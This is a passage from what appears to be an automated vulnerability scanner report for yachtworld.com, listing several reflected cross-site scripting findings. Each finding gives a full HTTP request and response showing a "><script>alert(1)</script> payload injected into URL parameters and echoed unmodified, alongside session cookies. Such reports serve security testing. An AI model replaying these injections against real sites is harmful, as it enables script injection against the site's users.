Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:05:31 GMT
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
"nofollow" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2141315&boat_id=2141315&back=/core/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States3f083"><script>alert(1)</script>b717be1f98b&boat_id=2141315">
...[SNIP]...

3.108. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6337a"><script>alert(1)</script>1388dae81f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States?6337a"><script>alert(1)</script>1388dae81f8=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:52 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Fri, 14 Jan 2011 23:08:20 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:03:52 GMT
Set-Cookie: VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
<a rel="nofollow" href="/core/listing/photoGallery.jsp?6337a"><script>alert(1)</script>1388dae81f8=1&slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2141315&boat_id=2141315&back=/core/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States&boat_id=2141315">
...[SNIP]...

3.109. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd4f9"><script>alert(1)</script>91ca0df6288 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdalecd4f9"><script>alert(1)</script>91ca0df6288/FL/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:04:20 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 14:45:25 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 20:04:20 GMT
Set-Cookie: VIEWED_BOATS_STORE=2255088%5B%25%5D32%27+Regulator+32FS+Center+Console+Loaded%21%5B%25%5DUSD%26nbsp%3B89%2C900%5B%25%5DFort+Lauderdale%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F5%2F5%2F0%2F2255088_1_mini.jpg%3F1250865908000%5B%25%5D%2Fboats%2F2004%2FRegulator-32FS-Center-Console-Loaded%2521-2255088%2FFort-Lauderdale%2FFL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...
" href="/core/listing/photoGallery.jsp?slim=quick&currency=USD&units=Feet&seo=0&checked_boats=2255088&boat_id=2255088&back=/core/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdalecd4f9"><script>alert(1)</script>91ca0df6288/FL/United-States&boat_id=2255088">
...[SNIP]...

3.110. http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb59c"><script>alert(1)</script>7529dd0e55 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FLeb59c"><script>alert(1)</script>7529dd0e55/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; 